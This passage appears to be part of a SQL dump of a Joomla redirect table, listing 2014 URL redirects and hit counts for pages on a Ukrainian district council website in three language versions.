00:00:00',301),(2011,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1308:2014-05-05-05-20-51&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',10,0,'2014-09-18 04:38:09','0000-00-00 00:00:00',301),(2012,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1011:2013-05-29-09-51-28&catid=11&lang=en&Itemid=','','','',10,0,'2014-09-18 04:39:03','0000-00-00 00:00:00',301),(2013,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1064:2013-08-09-07-52-21&catid=11&lang=en','','','',6,0,'2014-09-18 04:40:20','0000-00-00 00:00:00',301),(2014,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1168:2014-01-08-07-14-14&catid=55:--26122013-&Itemid=96&lang=ru','','','',14,0,'2014-09-18 04:40:29','0000-00-00 00:00:00',301),(2015,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1267:2014-04-03-21-52-50&catid=11&lang=uk','','','',6,0,'2014-09-18 04:41:22','0000-00-00 00:00:00',301),(2016,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1143:2013-11-26-13-23-37&catid=54&Itemid=95&lang=en','','','',5,0,'2014-09-18 04:43:16','0000-00-00 00:00:00',301),(2017,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1040:2013-07-01-14-27-50&catid=11&lang=ru&Itemid=','','','',2,0,'2014-09-18 04:44:57','0000-00-00 00:00:00',301),(2018,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1264:2014-04-01-11-27-13&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',12,0,'2014-09-18 04:47:07','0000-00-00 00:00:00',301),(2019,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=924:2013-02-20-19-06-08&catid=11&lang=en','','','',4,0,'2014-09-18 04:47:40','0000-00-00 00:00:00',301),(2020,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=956:2013-03-07-14-51-33&catid=11&lang=en&Itemid=','','','',5,0,'2014-09-18 04:48:41','0000-00-00 00:00:00',301),(2021,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=924:2013-02-20-19-06-08&catid=11&Itemid=14&lang=uk','','','',5,0,'2014-09-18 04:51:07','0000-00-00 00:00:00',301),(2022,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=969:-2013-&catid=46:--21122012&Itemid=85&lang=uk','','','',9,0,'2014-09-18 04:51:28','0000-00-00 00:00:00',301),(2023,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=864:-qq&catid=15:2010-06-06-09-34-01&Itemid=18&lang=en','','','',19,0,'2014-09-18 04:54:13','0000-00-00 00:00:00',301),(2024,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1121:-24-6-&catid=11&Itemid=14&lang=uk','','','',9,0,'2014-09-18 04:54:28','0000-00-00 00:00:00',301),(2025,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1007:-4-&catid=11&lang=uk&Itemid=','','','',6,0,'2014-09-18 04:55:40','0000-00-00 00:00:00',301),(2026,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1157:-11-2013-&catid=11&Itemid=14&lang=en','','','',9,0,'2014-09-18 04:55:55','0000-00-00 00:00:00',301),(2027,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1191:-2014-&catid=56&Itemid=97&lang=en','','','',11,0,'2014-09-18 04:57:20','0000-00-00 00:00:00',301),(2028,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=875:-2013-&catid=47&Itemid=86&lang=ru','','','',3,0,'2014-09-18 04:59:23','0000-00-00 00:00:00',301),(2029,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1096:2013-09-24-13-34-16&catid=53&Itemid=94&lang=uk','','','',6,0,'2014-09-18 04:59:29','0000-00-00 00:00:00',301),(2030,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1197:-l-r-&catid=56:--03022014-&Itemid=97&lang=en','','','',5,0,'2014-09-18 05:00:46','0000-00-00 00:00:00',301),(2031,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1266:2014-04-03-05-25-14&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',19,0,'2014-09-18 05:01:07','0000-00-00 00:00:00',301),(2032,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=862:------qq&catid=15&lang=en&Itemid=','','','',1,0,'2014-09-18 05:01:47','0000-00-00 00:00:00',301),(2033,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=911:2013-01-22-13-27-41&catid=11&lang=ru&Itemid=','','','',5,0,'2014-09-18 05:02:06','0000-00-00 00:00:00',301),(2034,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=992:-3-&catid=11&lang=en','','','',4,0,'2014-09-18 05:02:30','0000-00-00 00:00:00',301),(2035,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=956:2013-03-07-14-51-33&catid=11&lang=en','','','',4,0,'2014-09-18 05:02:58','0000-00-00 00:00:00',301),(2036,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1157:-11-2013-&catid=11&Itemid=14&lang=ru','','','',6,0,'2014-09-18 05:04:25','0000-00-00 00:00:00',301),(2037,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1278:2014-04-11-13-44-30&catid=11&lang=uk','','','',4,0,'2014-09-18 05:05:14','0000-00-00 00:00:00',301),(2038,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=884:2012-12-24-10-46-13&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',12,0,'2014-09-18 05:06:25','0000-00-00 00:00:00',301),(2039,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1126:2013-10-31-12-52-35&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',10,0,'2014-09-18 05:07:25','0000-00-00 00:00:00',301),(2040,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=915:-14-2012-340-l-2012-2013-&catid=47&Itemid=86&lang=en','','','',10,0,'2014-09-18 05:07:27','0000-00-00 00:00:00',301),(2041,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1232:2014-03-02-14-32-43&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',12,0,'2014-09-18 05:07:29','0000-00-00 00:00:00',301),(2042,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1220:2014-02-21-15-56-19&catid=11&Itemid=14&lang=en','','','',7,0,'2014-09-18 05:10:32','0000-00-00 00:00:00',301),(2043,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1174:-2013-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',12,0,'2014-09-18 05:12:07','0000-00-00 00:00:00',301),(2044,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1244:-2014-2018-&catid=58&Itemid=105&lang=uk','','','',6,0,'2014-09-18 05:12:20','0000-00-00 00:00:00',301),(2045,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1133:2013-11-14-07-12-22&catid=11&Itemid=14&lang=uk','','','',9,0,'2014-09-18 05:12:39','0000-00-00 00:00:00',301),(2046,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1143:2013-11-26-13-23-37&catid=54:--29112013-&Itemid=95&lang=uk','','','',7,0,'2014-09-18 05:13:48','0000-00-00 00:00:00',301),(2047,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1040:2013-07-01-14-27-50&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',5,0,'2014-09-18 05:14:30','0000-00-00 00:00:00',301),(2048,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1070:2013-08-23-04-27-00&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',3,0,'2014-09-18 05:15:46','0000-00-00 00:00:00',301),(2049,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1171:2014-01-11-09-58-40&catid=11&lang=ru&Itemid=','','','',7,0,'2014-09-18 05:17:33','0000-00-00 00:00:00',301),(2050,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=844:-2013-&catid=46&Itemid=85&lang=ru','','','',3,0,'2014-09-18 05:17:39','0000-00-00 00:00:00',301),(2051,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1082:------------2012-2015-&catid=36:2011-07-21-07-51-53&Itemid=70&lang=ru','','','',10,0,'2014-09-18 05:18:17','0000-00-00 00:00:00',301),(2052,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1068:-22-&catid=15:2010-06-06-09-34-01&Itemid=18&lang=en','','','',14,0,'2014-09-18 05:18:25','0000-00-00 00:00:00',301),(2053,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=982:2013-04-03-11-58-18&catid=49&Itemid=88&lang=uk','','','',5,0,'2014-09-18 05:18:27','0000-00-00 00:00:00',301),(2054,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=988:-2013-&catid=49&Itemid=88&lang=en','','','',22,0,'2014-09-18 05:19:15','0000-00-00 00:00:00',301),(2055,'http://www.malyn-rayrada.org.ua/index.php?option=com_phocagallery&view=category&id=1&Itemid=0&lang=ru','','','',7,0,'2014-09-18 05:19:24','0000-00-00 00:00:00',301),(2056,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1061:2013-07-29-08-58-16&catid=11&Itemid=14&lang=uk','','','',12,0,'2014-09-18 05:19:39','0000-00-00 00:00:00',301),(2057,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=866:2012-12-14-06-58-01&catid=11&lang=en','','','',2,0,'2014-09-18 05:19:41','0000-00-00 00:00:00',301),(2058,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=896:2013-01-17-07-42-35&catid=47&Itemid=86&lang=ru','','','',3,0,'2014-09-18 05:19:47','0000-00-00 00:00:00',301),(2059,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=976:2013-03-21-18-42-06&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',11,0,'2014-09-18 05:19:52','0000-00-00 00:00:00',301),(2060,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1146:2013-11-27-10-09-00&catid=11&lang=en&Itemid=','','','',5,0,'2014-09-18 05:20:10','0000-00-00 00:00:00',301),(2061,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=884:2012-12-24-10-46-13&catid=11&lang=en','','','',4,0,'2014-09-18 05:20:38','0000-00-00 00:00:00',301),(2062,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1214:2014-02-18-09-51-45&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',11,0,'2014-09-18 05:20:42','0000-00-00 00:00:00',301),(2063,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1171:2014-01-11-09-58-40&catid=11&lang=uk','','','',9,0,'2014-09-18 05:20:46','0000-00-00 00:00:00',301),(2064,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=956:2013-03-07-14-51-33&catid=11&lang=uk&Itemid=','','','',1,0,'2014-09-18 05:21:18','0000-00-00 00:00:00',301),(2065,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1010:-22-6-&catid=11&lang=en&Itemid=','','','',1,0,'2014-09-18 05:21:53','0000-00-00 00:00:00',301),(2066,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=903:-2012-&catid=11&lang=uk&Itemid=','','','',3,0,'2014-09-18 05:21:58','0000-00-00 00:00:00',301),(2067,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1213:2014-02-14-13-53-12&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',12,0,'2014-09-18 05:22:20','0000-00-00 00:00:00',301),(2068,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1004:2013-05-04-11-41-00&catid=11&lang=ru','','','',1,0,'2014-09-18 05:22:22','0000-00-00 00:00:00',301),(2069,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=926:2013-02-21-09-02-30&catid=47:-21022013-&Itemid=86&lang=en','','','',6,0,'2014-09-18 05:22:35','0000-00-00 00:00:00',301),(2070,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=893:-2013-2014-&catid=47&Itemid=86&lang=en','','','',2,0,'2014-09-18 05:23:26','0000-00-00 00:00:00',301),(2071,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1179:2014-01-21-12-44-04&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',7,0,'2014-09-18 05:23:28','0000-00-00 00:00:00',301),(2072,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1074:2013-09-02-05-02-30&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',11,0,'2014-09-18 05:23:44','0000-00-00 00:00:00',301),(2073,'http://www.malyn-rayrada.org.ua/index.php?option=com_phocagallery&view=categories&Itemid=&lang=en','','','',1,0,'2014-09-18 05:24:12','0000-00-00 00:00:00',301),(2074,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=919:2013-01-31-10-15-40&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',4,0,'2014-09-18 05:24:17','0000-00-00 00:00:00',301),(2075,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1329:2014-06-02-11-51-47&catid=11&lang=uk','','','',9,0,'2014-09-18 05:24:31','0000-00-00 00:00:00',301),(2076,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1074:2013-09-02-05-02-30&catid=11&lang=en&Itemid=','','','',4,0,'2014-09-18 05:24:47','0000-00-00 00:00:00',301),(2077,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1146:2013-11-27-10-09-00&catid=11&lang=uk','','','',11,0,'2014-09-18 05:25:11','0000-00-00 00:00:00',301),(2078,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1171:2014-01-11-09-58-40&catid=11&lang=en&Itemid=','','','',3,0,'2014-09-18 05:25:39','0000-00-00 00:00:00',301),(2079,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=939:-18-&catid=11&lang=uk','','','',3,0,'2014-09-18 05:25:41','0000-00-00 00:00:00',301),(2080,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1310:2014-05-06-14-07-43&catid=11&lang=uk','','','',8,0,'2014-09-18 05:25:54','0000-00-00 00:00:00',301),(2081,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1154:7-&catid=11&lang=en','','','',8,0,'2014-09-18 05:26:22','0000-00-00 00:00:00',301),(2082,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1009:2013-05-24-09-23-50&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',4,0,'2014-09-18 05:26:24','0000-00-00 00:00:00',301),(2083,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1106:-qq&catid=15&lang=en&Itemid=','','','',6,0,'2014-09-18 05:26:40','0000-00-00 00:00:00',301),(2084,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1013:2013-06-01-03-58-38&catid=11&lang=en&Itemid=','','','',3,0,'2014-09-18 05:26:44','0000-00-00 00:00:00',301),(2085,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=979:2013-03-29-09-18-27&catid=11&lang=uk','','','',5,0,'2014-09-18 05:27:03','0000-00-00 00:00:00',301),(2086,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1156:2013-12-09-07-12-03&catid=11&lang=uk','','','',6,0,'2014-09-18 05:27:12','0000-00-00 00:00:00',301),(2087,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1007:-4-&catid=11&lang=uk','','','',8,0,'2014-09-18 05:27:28','0000-00-00 00:00:00',301),(2088,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=941:2013-02-27-14-30-15&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',10,0,'2014-09-18 05:27:30','0000-00-00 00:00:00',301),(2089,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=978:-6612-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',5,0,'2014-09-18 05:27:43','0000-00-00 00:00:00',301),(2090,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=995:-2012-&catid=11&Itemid=14&lang=uk','','','',14,0,'2014-09-18 05:27:46','0000-00-00 00:00:00',301),(2091,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1042:-qq-&catid=11&lang=en&Itemid=','','','',5,0,'2014-09-18 05:28:23','0000-00-00 00:00:00',301),(2092,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1064:2013-08-09-07-52-21&catid=11&Itemid=14&lang=ru','','','',9,0,'2014-09-18 05:28:26','0000-00-00 00:00:00',301),(2093,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1345:2014-06-17-07-48-07&catid=59:--20062014-&Itemid=107&lang=uk','','','',10,0,'2014-09-18 05:28:48','0000-00-00 00:00:00',301),(2094,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1030:2013-06-17-06-46-59&catid=36&Itemid=70&lang=ru','','','',6,0,'2014-09-18 05:29:22','0000-00-00 00:00:00',301),(2095,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1027:-2013-2013-&catid=51:--19072013-&Itemid=92&lang=uk','','','',3,0,'2014-09-18 05:29:31','0000-00-00 00:00:00',301),(2096,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1133:2013-11-14-07-12-22&catid=11&lang=en&Itemid=','','','',2,0,'2014-09-18 05:30:02','0000-00-00 00:00:00',301),(2097,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1257:2014-03-29-18-03-31&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',17,0,'2014-09-18 05:30:10','0000-00-00 00:00:00',301),(2098,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=942:-19-6-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',6,0,'2014-09-18 05:30:21','0000-00-00 00:00:00',301),(2099,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1213:2014-02-14-13-53-12&catid=11&Itemid=14&lang=en','','','',3,0,'2014-09-18 05:31:56','0000-00-00 00:00:00',301),(2100,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=863:------qq&catid=15:2010-06-06-09-34-01&Itemid=18&lang=en','','','',1,0,'2014-09-18 05:31:58','0000-00-00 00:00:00',301),(2101,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1003:1&catid=11&lang=en&Itemid=','','','',5,0,'2014-09-18 05:32:00','0000-00-00 00:00:00',301),(2102,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1116:-2013-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',5,0,'2014-09-18 05:32:02','0000-00-00 00:00:00',301),(2103,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1308:2014-05-05-05-20-51&catid=11&lang=ru','','','',5,0,'2014-09-18 05:32:06','0000-00-00 00:00:00',301),(2104,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1174:-2013-&catid=11&Itemid=14&lang=ru','','','',3,0,'2014-09-18 05:36:00','0000-00-00 00:00:00',301),(2105,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1094:2013-09-24-05-02-52&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',12,0,'2014-09-18 05:37:05','0000-00-00 00:00:00',301),(2106,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1033:2013-06-18-12-58-36&catid=36&Itemid=70&lang=en','','','',1,0,'2014-09-18 05:37:31','0000-00-00 00:00:00',301),(2107,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=969:-2013-&catid=46&Itemid=85&lang=ru','','','',13,0,'2014-09-18 05:37:43','0000-00-00 00:00:00',301),(2108,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1073:2013-08-30-11-12-19&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',6,0,'2014-09-18 05:42:41','0000-00-00 00:00:00',301),(2109,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1025:------------2011-2015-&catid=36:2011-07-21-07-51-53&Itemid=70&lang=uk','','','',7,0,'2014-09-18 05:42:48','0000-00-00 00:00:00',301),(2110,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1062:2013-07-29-13-33-29&catid=11&Itemid=14&lang=ru','','','',9,0,'2014-09-18 05:42:50','0000-00-00 00:00:00',301),(2111,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1125:2013-10-31-07-20-16&lang=uk&layout=default&option=com_content&page&print=1&tmpl=component&view=article','','http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1125:2013-10-31-07-20-16&lang=uk&layout=default&option=com_content','',2,0,'2014-09-18 05:47:17','0000-00-00 00:00:00',301),(2112,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=1130:2013-11-07-14-04-12&lang=en&layout=default&page&print=1&tmpl=component&view=article','','http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=1130:2013-11-07-14-04-12&lang=en&layout=default&page&print=1&tmpl=component&','',2,0,'2014-09-18 05:57:17','0000-00-00 00:00:00',301),(2113,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=1110:-9-2013-&lang=uk&layout=default&page&print=1&tmpl=component&view=article','','http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=1110:-9-2013-&lang=uk&layout=default&page&print=1&tmpl=component&view=articl','',2,0,'2014-09-18 06:00:02','0000-00-00 00:00:00',301),(2114,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1155:2013-12-07-15-56-12&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',14,0,'2014-09-18 06:02:20','0000-00-00 00:00:00',301),(2115,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=1005:-7-1943-&lang=uk&layout=default&page&print=1&tmpl=component&view=article','','http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=1005:-7-1943-&lang=uk&layout=default&page&print=1&tmpl=component&view=articl','',2,0,'2014-09-18 06:05:27','0000-00-00 00:00:00',301),(2116,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=914:2013-01-23-13-21-28&catid=36:2011-07-21-07-51-53&Itemid=70&lang=uk','','','',3,0,'2014-09-18 06:26:48','0000-00-00 00:00:00',301),(2117,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1100:2013-10-02-18-03-10&catid=11&Itemid=14&lang=uk','','','',3,0,'2014-09-18 07:05:36','0000-00-00 00:00:00',301),(2118,'http://www.malyn-rayrada.org.ua/index.php?option=com_phocagallery&view=category&id=4&Itemid=1&lang=ru','','','',10,0,'2014-09-18 07:05:43','0000-00-00 00:00:00',301),(2119,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1007:-4-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',8,0,'2014-09-18 07:06:30','0000-00-00 00:00:00',301),(2120,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=879:2012-12-21-17-02-01&catid=46&Itemid=85&lang=uk','','','',6,0,'2014-09-18 07:42:48','0000-00-00 00:00:00',301),(2121,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1234:2014-03-04-09-59-46&catid=11&Itemid=14&lang=uk','','','',23,0,'2014-09-18 07:46:10','0000-00-00 00:00:00',301),(2122,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1116:-2013-&catid=11&lang=uk','','','',7,0,'2014-09-18 07:47:44','0000-00-00 00:00:00',301),(2123,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=970:-90-&catid=11&Itemid=14&lang=ru','','','',6,0,'2014-09-18 07:52:15','0000-00-00 00:00:00',301),(2124,'http://www.malyn-rayrada.org.ua/index.php?option=com_poll&id=10:2013-02-22-07-29-10&lang=uk','','','',10,0,'2014-09-18 08:12:24','0000-00-00 00:00:00',301),(2125,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1098:2013-09-25-09-34-57&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',7,0,'2014-09-18 08:13:17','0000-00-00 00:00:00',301),(2126,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1025:------------2011-2015-&catid=36:2011-07-21-07-51-53&Itemid=70&lang=ru','','','',3,0,'2014-09-18 08:13:21','0000-00-00 00:00:00',301),(2127,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1096:2013-09-24-13-34-16&catid=53:--25102013-&Itemid=94&lang=ru','','','',6,0,'2014-09-18 08:29:12','0000-00-00 00:00:00',301),(2128,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=943:-qq&catid=11&lang=uk','','','',7,0,'2014-09-18 08:33:02','0000-00-00 00:00:00',301),(2129,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1273:2014-04-10-06-15-24&catid=36:2011-07-21-07-51-53&Itemid=70&lang=en','','','',15,0,'2014-09-18 08:34:40','0000-00-00 00:00:00',301),(2130,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1273:2014-04-10-06-15-24&catid=36:2011-07-21-07-51-53&Itemid=70&lang=ru','','','',13,0,'2014-09-18 08:34:53','0000-00-00 00:00:00',301),(2131,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1275:2014-04-10-13-24-47&catid=36:2011-07-21-07-51-53&Itemid=70&lang=ru','','','',4,0,'2014-09-18 08:35:30','0000-00-00 00:00:00',301),(2132,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1276:2014-04-10-13-26-15&catid=36:2011-07-21-07-51-53&Itemid=70&lang=en','','','',46,0,'2014-09-18 08:35:48','0000-00-00 00:00:00',301),(2133,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1276:2014-04-10-13-26-15&catid=36:2011-07-21-07-51-53&Itemid=70&lang=ru','','','',6,0,'2014-09-18 08:36:00','0000-00-00 00:00:00',301),(2134,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1276:2014-04-10-13-26-15&catid=36:2011-07-21-07-51-53&Itemid=70&lang=uk','','','',7,0,'2014-09-18 08:36:11','0000-00-00 00:00:00',301),(2135,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1095:2013-09-24-13-25-55&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',7,0,'2014-09-18 09:01:20','0000-00-00 00:00:00',301),(2136,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1264:2014-04-01-11-27-13&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',17,0,'2014-09-18 09:17:34','0000-00-00 00:00:00',301),(2137,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1355:2014-07-02-06-11-04&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',8,0,'2014-09-18 09:20:44','0000-00-00 00:00:00',301),(2138,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=965:2013-03-14-10-56-03&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',3,0,'2014-09-18 09:21:14','0000-00-00 00:00:00',301),(2139,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=924:2013-02-20-19-06-08&catid=11&Itemid=14&lang=ru','','','',9,0,'2014-09-18 09:22:33','0000-00-00 00:00:00',301),(2140,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1114:-lr-&catid=53&Itemid=94&lang=uk','','','',10,0,'2014-09-18 09:29:55','0000-00-00 00:00:00',301),(2141,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1336:2014-06-10-11-01-06&catid=59&Itemid=107&lang=en','','','',9,0,'2014-09-18 09:31:02','0000-00-00 00:00:00',301),(2142,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1255:2014-03-27-06-02-11&catid=10:2010-06-05-13-46-44&Itemid=17&lang=en','','','',16,0,'2014-09-18 09:31:07','0000-00-00 00:00:00',301),(2143,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1324:2014-05-27-13-24-07&catid=59&Itemid=107&lang=en','','','',12,0,'2014-09-18 09:33:19','0000-00-00 00:00:00',301),(2144,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1274:----------------l--r&catid=36:2011-07-21-07-51-53&Itemid=70&lang=en','','','',12,0,'2014-09-18 09:34:29','0000-00-00 